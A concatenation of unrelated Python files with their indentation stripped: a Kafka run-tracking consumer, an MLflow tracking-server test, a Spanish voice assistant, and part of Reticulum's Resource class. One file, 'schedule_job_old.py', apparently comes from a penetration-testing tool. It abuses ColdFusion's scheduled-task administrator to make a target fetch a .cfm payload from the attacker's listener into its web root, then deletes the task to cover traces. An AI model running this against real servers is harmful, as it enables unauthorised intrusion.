experiment_name = sanitize_path(message['experiment'])
exp = experiment_table.search(tinydb.where('experiment') == experiment_name)
if exp:
exp = exp[0]
else:
logging.warning(
'Tried to remove a process from an experiment, but the experiment does not exist.')
return
try:
_PROC_DB[exp['experiment']][message['run_id']]['producers'].remove(message['rank_id'])
except KeyError:
logging.warning(
'Tried to remove a rank producer from an experiment, but the producer does not exist.'
)
if not _PROC_DB[exp['experiment']][message['run_id']]['producers']:
# Remove the topic for the run
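# remove_runid runs in a separate process: it waits 30 seconds (an assumed grace
# period for the topic listener to drain remaining messages), terminates the
# listener process, marks the run as finished in the run DB, and deletes the
# run's Kafka topic.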
def remove_runid():
time.sleep(30)
atexit.unregister(_PROC_DB[exp['experiment']][message['run_id']]['process'].terminate)
_PROC_DB[exp['experiment']][message['run_id']]['process'].terminate()
# Update the run DB
logging.info('Setting runs to finished')
run_table = run_db.table('runs')
run_table.update({'finished': True}, tinydb.where('run_id') == message['run_id'])
try:
logging.info('Removing Kafka topic: {}'.format(message['run_id']))
results = adm_cli.delete_topics([message['run_id']])
for v in results.values():
v.result()
except KafkaException:
pass
multiprocessing.Process(target=remove_runid).start()
def process_create_message(message, run_db, data_directory, api_key, port):
# Register the experiment and run
# Create and register the experiment
if 'experiment' not in message or 'run_id' not in message or 'rank_id' not in message:
logging.error('Invalid creation announcement received')
return False
experiment_table = run_db.table('experiments')
experiment_name = sanitize_path(message['experiment'])
experiment = experiment_table.search(tinydb.where('experiment') == experiment_name)
if not experiment:
logging.info('Creating experiment: %s', experiment_name)
# Make a directory for the experiment
data_path = os.path.join(data_directory, experiment_name)
logging.info('Experiment data located at: %s', data_path)
mkdir_p(data_path)
# Create the experiment
experiment_table.insert({'experiment': experiment_name, 'data_path': data_path})
exp = experiment_table.search(tinydb.where('experiment') == experiment_name)[0]
else:
exp = experiment[0]
if exp['experiment'] not in _PROC_DB:
_PROC_DB[exp['experiment']] = {}
# Create and register the run ID
run_table = run_db.table('runs')
runs = run_table.search((tinydb.where('experiment') == experiment_name) &
(tinydb.where('run_id') == message['run_id']))
if not runs:
# Create the run
run_path = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S")
run_directory = os.path.join(data_directory, experiment_name, run_path)
mkdir_p(run_directory)
# Update the database
run_table.insert({
'experiment': experiment_name,
'run_id': message['run_id'],
'run_directory': run_directory,
'finished': False
})
run = run_table.search((tinydb.where('experiment') == experiment_name) &
(tinydb.where('run_id') == message['run_id']))[0]
else:
run = runs[0]
# Start the process
if message['run_id'] not in _PROC_DB[
exp['experiment']] or not _PROC_DB[exp['experiment']][message['run_id']]['process'].is_alive():
_PROC_DB[exp['experiment']][message['run_id']] = {
'process': multiprocessing.Process(target=launch_topic_listener, args=(
exp,
api_key,
run,
port,
)),
'producers': set(),
'finished': False,
}
_PROC_DB[exp['experiment']][message['run_id']]['process'].start()
atexit.register(_PROC_DB[exp['experiment']][message['run_id']]['process'].terminate)
_PROC_DB[exp['experiment']][message['run_id']]['producers'].add(message['rank_id'])
return True
def launch(api_key, port, data_directory=None, topic='announce'):
logging.basicConfig(level=logging.DEBUG)
# Initialize the database
if data_directory is None:
data_directory = os.getcwd()
db = tinydb.TinyDB(os.path.join(data_directory, 'run_db.json'))
logging.info('Constructing local consumer')
consumer = Consumer({
'bootstrap.servers': 'localhost:' + str(port),
'group.id': 0,
'auto.offset.reset': 'earliest',
'sasl.username': 'admin',
'sasl.password': api_key,
'security.protocol': 'sasl_plaintext',
'sasl.mechanism': 'PLAIN',
})
adm_client = AdminClient({
'bootstrap.servers': 'localhost:' + str(port),
'group.id': 0,
'auto.offset.reset': 'earliest',
'sasl.username': 'admin',
'sasl.password': api_key,
'security.protocol': 'sasl_plaintext',
'sasl.mechanism': 'PLAIN',
})
# Clean up the Kafka board
try:
results = adm_client.delete_topics(list(consumer.list_topics().topics.keys()))
for v in results.values():
v.result()
except ValueError:
pass
# Create the announce topic
try:
logging.info('Setting up announce topic')
tp_future = adm_client.create_topics([NewTopic('announce', 1, 1)])
tp_future['announce'].result() # Wait for the future
logging.info('Topic created!')
except KafkaException as ex:
logging.warning(ex)
logging.info('Connecting to topic: %s', topic)
consumer.subscribe([topic])
# Main consumer loop
while True:
msg = consumer.poll(0.1)
# Validate the message is good
if msg is None:
continue
if msg.error():
logging.error('Topic Consumer Error: %s', msg.error())
continue
logging.info('Processing Message')
process_message(msg.value(), db, data_directory, api_key, port, adm_client)
|
test_rest_tracking.py
|
"""
Integration test which starts a local Tracking Server on an ephemeral port,
and ensures we can use the tracking API to communicate with it.
"""
import mock
from multiprocessing import Process
import os
import pytest
import socket
import time
import tempfile
from click.testing import CliRunner
import mlflow.experiments
from mlflow.entities import RunStatus
from mlflow.protos.service_pb2 import LOCAL as SOURCE_TYPE_LOCAL
from mlflow.server import app, BACKEND_STORE_URI_ENV_VAR
from mlflow.tracking import MlflowClient
from mlflow.utils.mlflow_tags import MLFLOW_RUN_NAME, MLFLOW_PARENT_RUN_ID, MLFLOW_SOURCE_TYPE, \
MLFLOW_SOURCE_NAME, MLFLOW_PROJECT_ENTRY_POINT, MLFLOW_GIT_COMMIT
LOCALHOST = '127.0.0.1'
SERVER_PORT = 0
def _get_safe_port():
"""Returns an ephemeral port that is very likely to be free to bind to."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCALHOST, 0))
port = sock.getsockname()[1]
sock.close()
return port
def _await_server_up_or_die(port, timeout=60):
"""Waits until the local flask server is listening on the given port."""
print('Awaiting server to be up on %s:%s' % (LOCALHOST, port))
start_time = time.time()
connected = False
while not connected and time.time() - start_time < timeout:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((LOCALHOST, port))
if result == 0:
connected = True
else:
print('Server not yet up, waiting...')
time.sleep(0.5)
if not connected:
raise Exception('Failed to connect on %s:%s after %s seconds' % (LOCALHOST, port, timeout))
print('Server is up on %s:%s!' % (LOCALHOST, port))
# NB: We explicitly wait and timeout on server shutdown in order to ensure that pytest output
# reveals the cause in the event of a test hang due to the subprocess not exiting.
def _await_server_down_or_die(process, timeout=60):
"""Waits until the local flask server process is terminated."""
print('Awaiting termination of server process...')
start_time = time.time()
while process.is_alive() and time.time() - start_time < timeout:
time.sleep(0.5)
if process.is_alive():
raise Exception('Server failed to shutdown after %s seconds' % timeout)
@pytest.fixture(scope="module", autouse=True)
def init_and_tear_down_server(request):
"""
Once per run of the entire set of tests, we create a new server, and
clean it up at the end.
"""
global SERVER_PORT
SERVER_PORT = _get_safe_port()
file_store_path = tempfile.mkdtemp("test_rest_tracking_file_store")
env = {BACKEND_STORE_URI_ENV_VAR: file_store_path}
with mock.patch.dict(os.environ, env):
process = Process(target=lambda: app.run(LOCALHOST, SERVER_PORT))
process.start()
_await_server_up_or_die(SERVER_PORT)
# Yielding here causes pytest to resume execution at the end of all tests.
yield
print("Terminating server...")
process.terminate()
_await_server_down_or_die(process)
@pytest.fixture()
def tracking_server_uri():
"""Provides a tracking URI for communicating with the local tracking server."""
return "http://{hostname}:{port}".format(hostname=LOCALHOST, port=SERVER_PORT)
@pytest.fixture()
def mlflow_client(tracking_server_uri):
"""Provides an MLflow Tracking API client pointed at the local tracking server."""
return MlflowClient(tracking_server_uri)
@pytest.fixture()
def cli_env(tracking_server_uri):
"""Provides an environment for the MLflow CLI pointed at the local tracking server."""
cli_env = {
"LC_ALL": "en_US.UTF-8",
"LANG": "en_US.UTF-8",
"MLFLOW_TRACKING_URI": tracking_server_uri,
}
return cli_env
def test_create_get_list_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('My Experiment',
artifact_location='my_location')
exp = mlflow_client.get_experiment(experiment_id)
assert exp.name == 'My Experiment'
assert exp.artifact_location == 'my_location'
experiments = mlflow_client.list_experiments()
assert set([e.name for e in experiments]) == {'My Experiment'}
def test_delete_restore_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('Deleterious')
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
mlflow_client.delete_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
mlflow_client.restore_experiment(experiment_id)
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_delete_restore_experiment_cli(mlflow_client, cli_env):
experiment_name = "DeleteriousCLI"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['delete', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'deleted'
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['restore', str(experiment_id)])
assert mlflow_client.get_experiment(experiment_id).lifecycle_stage == 'active'
def test_rename_experiment(mlflow_client):
experiment_id = mlflow_client.create_experiment('BadName')
assert mlflow_client.get_experiment(experiment_id).name == 'BadName'
mlflow_client.rename_experiment(experiment_id, 'GoodName')
assert mlflow_client.get_experiment(experiment_id).name == 'GoodName'
def test_rename_experiment_cli(mlflow_client, cli_env):
bad_experiment_name = "BadName"
good_experiment_name = "GoodName"
CliRunner(env=cli_env).invoke(mlflow.experiments.commands, ['create', bad_experiment_name])
experiment_id = mlflow_client.get_experiment_by_name(bad_experiment_name).experiment_id
assert mlflow_client.get_experiment(experiment_id).name == bad_experiment_name
CliRunner(env=cli_env).invoke(
mlflow.experiments.commands,
['rename', str(experiment_id), good_experiment_name])
assert mlflow_client.get_experiment(experiment_id).name == good_experiment_name
def test_create_run_all_args(mlflow_client):
source_name = "Hello"
entry_point = "entry"
source_version = "abc"
create_run_kwargs = {
"user_id": "123",
"run_name": "My name",
"start_time": 456,
"tags": {
MLFLOW_SOURCE_TYPE: "LOCAL",
MLFLOW_SOURCE_NAME: source_name,
MLFLOW_PROJECT_ENTRY_POINT: entry_point,
MLFLOW_GIT_COMMIT: source_version,
MLFLOW_PARENT_RUN_ID: "7",
"my": "tag",
"other": "tag",
}
}
experiment_id = mlflow_client.create_experiment('Run A Lot')
created_run = mlflow_client.create_run(experiment_id, **create_run_kwargs)
run_id = created_run.info.run_uuid
print("Run id=%s" % run_id)
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id == create_run_kwargs["user_id"]
assert run.info.source_type == SOURCE_TYPE_LOCAL
assert run.info.source_name == source_name
assert run.info.entry_point_name == entry_point
assert run.info.start_time == create_run_kwargs["start_time"]
assert run.info.source_version == source_version
actual_tags = {t.key: t.value for t in run.data.tags}
for tag in create_run_kwargs["tags"]:
assert tag in actual_tags
assert actual_tags.get(MLFLOW_RUN_NAME) == create_run_kwargs["run_name"]
assert mlflow_client.list_run_infos(experiment_id) == [run.info]
def test_create_run_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Run A Little')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
run = mlflow_client.get_run(run_id)
assert run.info.run_uuid == run_id
assert run.info.experiment_id == experiment_id
assert run.info.user_id is not None # we should pick some default
def test_log_metrics_params_tags(mlflow_client):
experiment_id = mlflow_client.create_experiment('Oh My')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
mlflow_client.log_metric(run_id, 'metric', 123.456)
mlflow_client.log_param(run_id, 'param', 'value')
mlflow_client.set_tag(run_id, 'taggity', 'do-dah')
run = mlflow_client.get_run(run_id)
metrics = {t.key: t.value for t in run.data.metrics}
params = {t.key: t.value for t in run.data.params}
tags = {t.key: t.value for t in run.data.tags}
assert metrics.get('metric') == 123.456
assert params.get('param') == 'value'
assert tags.get('taggity') == 'do-dah'
def test_set_terminated_defaults(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 1')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id)
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FINISHED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_set_terminated_status(mlflow_client):
experiment_id = mlflow_client.create_experiment('Terminator 2')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'RUNNING'
assert mlflow_client.get_run(run_id).info.end_time is None
mlflow_client.set_terminated(run_id, 'FAILED')
assert RunStatus.to_string(mlflow_client.get_run(run_id).info.status) == 'FAILED'
assert mlflow_client.get_run(run_id).info.end_time <= int(time.time() * 1000)
def test_artifacts(mlflow_client):
experiment_id = mlflow_client.create_experiment('Art In Fact')
created_run = mlflow_client.create_run(experiment_id)
run_id = created_run.info.run_uuid
src_dir = tempfile.mkdtemp('test_artifacts_src')
src_file = os.path.join(src_dir, 'my.file')
with open(src_file, 'w') as f:
f.write('Hello, World!')
mlflow_client.log_artifact(run_id, src_file, None)
mlflow_client.log_artifacts(run_id, src_dir, 'dir')
root_artifacts_list = mlflow_client.list_artifacts(run_id)
assert set([a.path for a in root_artifacts_list]) == {'my.file', 'dir'}
dir_artifacts_list = mlflow_client.list_artifacts(run_id, 'dir')
assert set([a.path for a in dir_artifacts_list]) == {'dir/my.file'}
all_artifacts = mlflow_client.download_artifacts(run_id, '.')
assert open('%s/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
assert open('%s/dir/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
dir_artifacts = mlflow_client.download_artifacts(run_id, 'dir')
assert open('%s/my.file' % dir_artifacts, 'r').read() == 'Hello, World!'
|
schedule_job_old.py
|
from src.platform.coldfusion.interfaces import CINTERFACES
from src.platform.coldfusion.authenticate import checkAuth
from src.module.deploy_utils import _serve, waitServe, parse_war_path, killServe
from threading import Thread
from os.path import abspath
from re import findall
from time import sleep
from log import LOG
import utility
import state
title = CINTERFACES.CFM
versions = ['5.0', '6.0', '6.1']
def deploy(fingerengine, fingerprint):
""" Scheduled Task deployer for older versions; radically different
from newer systems, so it warrants its own deployer.
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)[0]
if not cookie:
utility.Msg("Could not get auth", LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(cfm_file))
utility.Msg("Fetching web root...", LOG.DEBUG)
root = fetch_webroot(dip, fingerprint, cookie)
if not root:
utility.Msg("Unable to fetch web root.", LOG.ERROR)
return
# create the scheduled task
utility.Msg("Web root found at %s" % root, LOG.DEBUG)
utility.Msg("Creating scheduled task...")
if not create_task(dip, fingerprint, cfm_file, root, cookie):
return
# invoke the task
utility.Msg("Task %s created, invoking..." % cfm_file)
run_task(dip, fingerprint, cfm_path, cookie)
# cleanup
utility.Msg("Cleaning up...")
if not delete_task(dip, fingerprint, cfm_file, cookie):
utility.Msg("Failed to remove task. May require manual removal.", LOG.ERROR)
def create_task(ip, fingerprint, cfm_file, root, cookie):
""" Generate a new task; all parameters are necessary, unfortunately
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm'
if fingerprint.version in ['5.0']:
data = {
"taskNameOrig" : "",
"TaskName" : cfm_file,
"StartDate" : "01/01/2020",
"EndDate" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:05",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"Port" : state.external_port,
"ScheduledURL" : "http://{0}/{1}".format(utility.local_address(), cfm_file),
"Username" : "",
"Password" : "",
"RequestTimeout" : "10",
"ProxyServer" : "",
"HttpProxyPort" : "23",
"Publish" : "1",
"filePath" : root,
"File" : cfm_file.replace('cfml', 'cfm'),
"adminsubmit" : "Submit+Changes"
}
else:
data = {
"TaskName" : cfm_file,
"Start_Date" : "Jan 2, 2020",
"End_Date" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:50",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval_hour" : "0",
"customInterval_min" : "0",
"customInterval_sec" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, cfm_file),
"Username" : "",
"Password" : "",
"Request_Time_out" : "",
"proxy_server" : "",
"http_proxy_port" : "",
"publish" : "1",
"publish_file" : root + "\\" + cfm_file,
"adminsubmit" : "Submit",
"taskNameOrig" : ""
}
response = utility.requests_post(base+uri, data=data, cookies=cookie)
if response.status_code == 200:
return True
def run_task(ip, fingerprint, cfm_path, cookie):
""" Invoke the task and wait for the server to fetch it
"""
success = False
cfm_file = parse_war_path(cfm_path, True)
# start up our listener
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/scheduler/runtask.cfm?task=%s' % cfm_file
else:
uri = '/CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=%s'\
% cfm_file
response = utility.requests_get(base + uri, cookies=cookie)
if waitServe(server_thread):
if fingerprint.version in ['5.0']:
out_diag = "{0} deployed to /{0}".format(cfm_file.replace('cfml','cfm'))
else:
out_diag = "{0} deployed to /CFIDE/{0}".format(cfm_file)
utility.Msg(out_diag, LOG.SUCCESS)
success = True
killServe()
return success
def delete_task(ip, fingerprint, cfm_file, cookie):
"""
"""
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/deletetask.cfm'
data = {
"deletesubmit" : "Yes",
"task" : cfm_file
}
response = utility.requests_post(base + uri, data=data, cookies=cookie)
if response.status_code == 200:
return True
def fetch_webroot(ip, fingerprint, cookie):
""" Fetch the webroot for the CF server; this is where our
payload is stashed
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = "/CFIDE/administrator/server_settings/mappings.cfm?mapname=/"
else:
uri = '/CFIDE/administrator/settings/mappings.cfm?mapname=/CFIDE'
response = utility.requests_get(base+uri, cookies=cookie)
if response.status_code == 200:
if fingerprint.version in ['5.0']:
data = findall("name=\"DirectoryPath\" value=\"(.*?)\"",
response.content)
if data and len(data) > 0:
data = data[0]
else:
data = findall("<td nowrap><font class=\"label\"> (.*?) ",
response.content)
if data and len(data) > 0:
data = data[1]
if data:
return data
|
assistant.py
|
#!/usr/bin/python
import threading
from time import sleep
import re
from core.twitterc import TwitterC
from core.voicerecognition import VoiceRecognition
from core.voicesynthetizer import VoiceSynthetizer
from modules.voicemail import VoiceMail
from modules.clock import Clock
from modules.identification import Identification
from modules.weather import Weather
from modules.messages import Messages
from modules.seismology import Seismology
def main(voicesynthetizer):
voicesynthetizer = voicesynthetizer
t = Assistant(voicesynthetizer)
t.go()
try:
join_threads(t.threads)
except KeyboardInterrupt:
print "\nKeyboardInterrupt caught."
print "Terminate main thread."
print "If only daemonic threads are left, terminate whole program."
class Assistant(object):
def __init__(self, voicesynthetizer):
self.modulename = 'Assistant'
self.running = True
self.introduced = False
self.threads = []
self.voicesynthetizer = voicesynthetizer
self.voicerecognition = VoiceRecognition(self.voicesynthetizer)
self.voicemail = VoiceMail(self.voicesynthetizer)
self.clock = Clock(voicesynthetizer)
self.identification = Identification(voicesynthetizer)
self.weather = Weather(self.voicesynthetizer)
self.messages = Messages(self.voicesynthetizer)
self.seismology = Seismology(self.voicesynthetizer)
def demo1(self):
self.introduction1()
self.command()
def demo2(self):
self.introduction2()
self.command()
def introduction1(self):
self.voicesynthetizer.speechit("Hola! Dime como puedo ayudarte?")
self.introduced = True
def introduction2(self):
while True:
self.voicerecognition.record('5')
output = self.voicerecognition.recognize('False')
if re.search(r'hola', output, re.M|re.I) or re.search(r'nu', output, re.M|re.I):
self.voicesynthetizer.speechit("Hola! Dime como puedo ayudarte?")
self.introduced = True
break
def command(self):
while self.introduced:
self.voicerecognition.record()
output = self.voicerecognition.recognize('False')
if re.search(r'identif', output, re.M|re.I):
print '[NuupXe] Assistant Identification'
self.identification.identify()
elif re.search(r'hora', output, re.M|re.I) or re.search(r'ora', output, re.M|re.I) :
print '[NuupXe] Assistant Hour'
self.clock.hour()
elif re.search(r'fecha', output, re.M|re.I):
print '[NuupXe] Assistant Date'
self.clock.date()
elif re.search(r'reporte', output, re.M|re.I) or re.search(r'clima', output, re.M|re.I):
print '[NuupXe] Assistant Weather'
self.weather.report()
elif re.search(r'estaciones', output, re.M|re.I) or re.search(r'repetidores', output, re.M|re.I):
print '[NuupXe] Assistant Stations'
self.messages.stations()
elif re.search(r'sismo', output, re.M|re.I):
print '[NuupXe] Assistant Seismic'
self.seismology.SismologicoMX()
elif re.search(r'mensaje', output, re.M|re.I) or re.search(r'avis', output, re.M|re.I):
print '[NuupXe] Assistant Message'
if self.voicemail.status:
self.voicesynthetizer.speechit("Mensaje existente!")
while True:
self.voicesynthetizer.speechit("Quieres escucharlo, borrarlo o salir de esta opcion")
self.voicerecognition.record()
output = self.voicerecognition.recognize('False')
if re.search(r'escuchar', output, re.M|re.I):
print '[NuupXe] Assistant Message Play'
self.voicemail.play()
elif re.search(r'borrar', output, re.M|re.I):
print '[NuupXe] Assistant Message Erase'
self.voicemail.erase()
elif re.search(r'salir', output, re.M|re.I):
print '[NuupXe] Assistant Message Quit'
self.voicesynthetizer.speechit("Saliendo de Opcion Mensaje")
break
else:
self.voicemail.record()
self.voicemail.play()
elif re.search(r'dormir', output, re.M|re.I):
print '[NuupXe] Assistant Sleep'
self.voicesynthetizer.speechit("Perfecto! Gracias! Dormire por los proximos 30 segundos")
sleep(30)
self.voicesynthetizer.speechit("Ya desperte! Que rica siesta!")
elif re.search(r'eventos', output, re.M|re.I):
print '[NuupXe] Assistant Events'
self.voicesynthetizer.speechit("El radioclub tiene 2 eventos proximos")
self.voicesynthetizer.speechit("Boletin Tecnologico, Miercoles, 8:00 pm")
self.voicesynthetizer.speechit("Junta Mensual, Jueves 8:00 pm, recuerda traer galletas")
elif re.search(r'nada', output, re.M|re.I) or re.search(r'dios', output, re.M|re.I) or re.search(r'ativo', output, re.M|re.I):
print '[NuupXe] Assistant Bye'
self.voicesynthetizer.speechit("Hasta pronto!")
self.running = False
break
else:
print '[NuupXe] Assistant? Unknown!'
self.voicesynthetizer.speechit("Se ofrece algo mas?")
def foo(self):
while(self.running):
print '[NuupXe] Assistante | Foo Hello'
sleep(5)
def get_user_input(self):
while True:
x = raw_input("Type any text, enter 'e' to exit: ")
if x.lower() == 'e':
self.running = False
break
else:
self.voicesynthetizer.speechit(x)
def twitter(self):
return
self.twitterc = TwitterC('twython')
self.oldstatus = ''
self.newstatus = ''
while (self.running):
print '[NuupXe] Assistante | Twitter Hello'
#self.voicesynthetizer.speechit("Veamos")
tstatus = self.twitterc.timeline_get('xe1gyq', 1)
for status in tstatus:
self.newstatus = status['text']
if self.newstatus != self.oldstatus:
self.oldstatus = self.newstatus
self.voicesynthetizer.speechit("Nuevo mensaje en cuenta de Twitter!")
self.voicesynthetizer.speechit(self.newstatus)
sleep(5)
def go(self):
t1 = threading.Thread(target=self.foo)
t2 = threading.Thread(target=self.get_user_input)
t3 = threading.Thread(target=self.twitter)
t4 = threading.Thread(target=self.demo1)
# Make threads daemonic, i.e. terminate them when main thread
# terminates. From: http://stackoverflow.com/a/3788243/145400
t1.daemon = True
t2.daemon = True
t3.daemon = True
t4.daemon = True
t1.start()
t2.start()
t3.start()
t4.start()
self.threads.append(t1)
self.threads.append(t2)
self.threads.append(t3)
self.threads.append(t4)
def join_threads(threads):
"""
Join threads in interruptable fashion.
From http://stackoverflow.com/a/9790882/145400
"""
for t in threads:
while t.isAlive():
t.join(5)
# End of File
|
Resource.py
|
import RNS
import os
import bz2
import math
import time
import threading
from .vendor import umsgpack as umsgpack
from time import sleep
class Resource:
"""
The Resource class allows transferring arbitrary amounts
of data over a link. It will automatically handle sequencing,
compression, coordination and checksumming.
:param data: The data to be transferred. Can be *bytes* or an open *file handle*. See the :ref:`Filetransfer Example<example-filetransfer>` for details.
:param link: The :ref:`RNS.Link<api-link>` instance on which to transfer the data.
:param advertise: Whether to automatically advertise the resource. Can be *True* or *False*.
:param auto_compress: Whether to auto-compress the resource. Can be *True* or *False*.
:param callback: A *callable* with the signature *callback(resource)*. Will be called when the resource transfer concludes.
:param progress_callback: A *callable* with the signature *callback(resource)*. Will be called whenever the resource transfer progress is updated.
:param segment_index: Internal use, ignore.
:param original_hash: Internal use, ignore.
"""
WINDOW_FLEXIBILITY = 4
WINDOW_MIN = 1
WINDOW_MAX = 10
WINDOW = 4
MAPHASH_LEN = 4
SDU = RNS.Packet.MDU
RANDOM_HASH_SIZE = 4
# This is an indication of what the
# maximum size a resource should be, if
# it is to be handled within reasonable
# time constraint, even on small systems.
# A small system in this regard is
# defined as a Raspberry Pi, which should
# be able to compress, encrypt and hash-map
# the resource in about 10 seconds.
# This constant will be used when determining
# how to sequence the sending of large resources.
MAX_EFFICIENT_SIZE = 16 * 1024 * 1024
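# Worked example of the sequencing this implies: with MAX_EFFICIENT_SIZE at
# 16 MiB, a 40 MiB input file is sent as ((40 MiB - 1) // 16 MiB) + 1 = 3
# segments (matching the total_segments computation in __init__ below), while
# anything up to exactly 16 MiB still goes out as a single segment.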
# The maximum size to auto-compress with
# bz2 before sending.
AUTO_COMPRESS_MAX_SIZE = MAX_EFFICIENT_SIZE
# TODO: Should be allocated more
# intelligently
# TODO: Set higher
MAX_RETRIES = 5
SENDER_GRACE_TIME = 10
RETRY_GRACE_TIME = 0.25
HASHMAP_IS_NOT_EXHAUSTED = 0x00
HASHMAP_IS_EXHAUSTED = 0xFF
# Status constants
NONE = 0x00
QUEUED = 0x01
ADVERTISED = 0x02
TRANSFERRING = 0x03
AWAITING_PROOF = 0x04
ASSEMBLING = 0x05
COMPLETE = 0x06
FAILED = 0x07
CORRUPT = 0x08
@staticmethod
def accept(advertisement_packet, callback=None, progress_callback = None):
try:
adv = ResourceAdvertisement.unpack(advertisement_packet.plaintext)
resource = Resource(None, advertisement_packet.link)
resource.status = Resource.TRANSFERRING
resource.flags = adv.f
resource.size = adv.t
resource.total_size = adv.d
resource.uncompressed_size = adv.d
resource.hash = adv.h
resource.original_hash = adv.o
resource.random_hash = adv.r
resource.hashmap_raw = adv.m
resource.encrypted = True if resource.flags & 0x01 else False
resource.compressed = True if resource.flags >> 1 & 0x01 else False
resource.initiator = False
resource.callback = callback
resource.__progress_callback = progress_callback
resource.total_parts = int(math.ceil(resource.size/float(Resource.SDU)))
resource.received_count = 0
resource.outstanding_parts = 0
resource.parts = [None] * resource.total_parts
resource.window = Resource.WINDOW
resource.window_max = Resource.WINDOW_MAX
resource.window_min = Resource.WINDOW_MIN
resource.window_flexibility = Resource.WINDOW_FLEXIBILITY
resource.last_activity = time.time()
resource.storagepath = RNS.Reticulum.resourcepath+"/"+resource.original_hash.hex()
resource.segment_index = adv.i
resource.total_segments = adv.l
if adv.l > 1:
resource.split = True
else:
resource.split = False
resource.hashmap = [None] * resource.total_parts
resource.hashmap_height = 0
resource.waiting_for_hmu = False
resource.receiving_part = False
resource.consecutive_completed_height = 0
resource.link.register_incoming_resource(resource)
RNS.log("Accepting resource advertisement for "+RNS.prettyhexrep(resource.hash), RNS.LOG_DEBUG)
resource.link.callbacks.resource_started(resource)
resource.hashmap_update(0, resource.hashmap_raw)
resource.watchdog_job()
return resource
except Exception as e:
RNS.log("Could not decode resource advertisement, dropping resource", RNS.LOG_DEBUG)
return None
# Create a resource for transmission to a remote destination
# The data passed can be either a bytes-array or a file opened
# in binary read mode.
def __init__(self, data, link, advertise=True, auto_compress=True, callback=None, progress_callback=None, segment_index = 1, original_hash = None):
data_size = None
resource_data = None
if hasattr(data, "read"):
data_size = os.stat(data.name).st_size
self.total_size = data_size
self.grand_total_parts = math.ceil(data_size/Resource.SDU)
if data_size <= Resource.MAX_EFFICIENT_SIZE:
self.total_segments = 1
self.segment_index = 1
self.split = False
resource_data = data.read()
data.close()
else:
self.total_segments = ((data_size-1)//Resource.MAX_EFFICIENT_SIZE)+1
self.segment_index = segment_index
self.split = True
seek_index = segment_index-1
seek_position = seek_index*Resource.MAX_EFFICIENT_SIZE
data.seek(seek_position)
resource_data = data.read(Resource.MAX_EFFICIENT_SIZE)
self.input_file = data
elif isinstance(data, bytes):
data_size = len(data)
self.grand_total_parts = math.ceil(data_size/Resource.SDU)
self.total_size = data_size
resource_data = data
self.total_segments = 1
self.segment_index = 1
self.split = False
elif data == None:
pass
else:
raise TypeError("Invalid data instance type passed to resource initialisation")
data = resource_data
self.status = Resource.NONE
self.link = link
self.max_retries = Resource.MAX_RETRIES
self.retries_left = self.max_retries
self.default_timeout = self.link.default_timeout
self.timeout_factor = self.link.timeout_factor
self.sender_grace_time = Resource.SENDER_GRACE_TIME
self.hmu_retry_ok = False
self.watchdog_lock = False
self.__watchdog_job_id = 0
self.__progress_callback = progress_callback
self.rtt = None
self.receiver_min_consecutive_height = 0
if data != None:
self.initiator = True
self.callback = callback
self.uncompressed_data = data
compression_began = time.time()
if (auto_compress and len(self.uncompressed_data) < Resource.AUTO_COMPRESS_MAX_SIZE):
RNS.log("Compressing resource data...", RNS.LOG_DEBUG)
self.compressed_data = bz2.compress(self.uncompressed_data)
RNS.log("Compression completed in "+str(round(time.time()-compression_began, 3))+" seconds", RNS.LOG_DEBUG)
else:
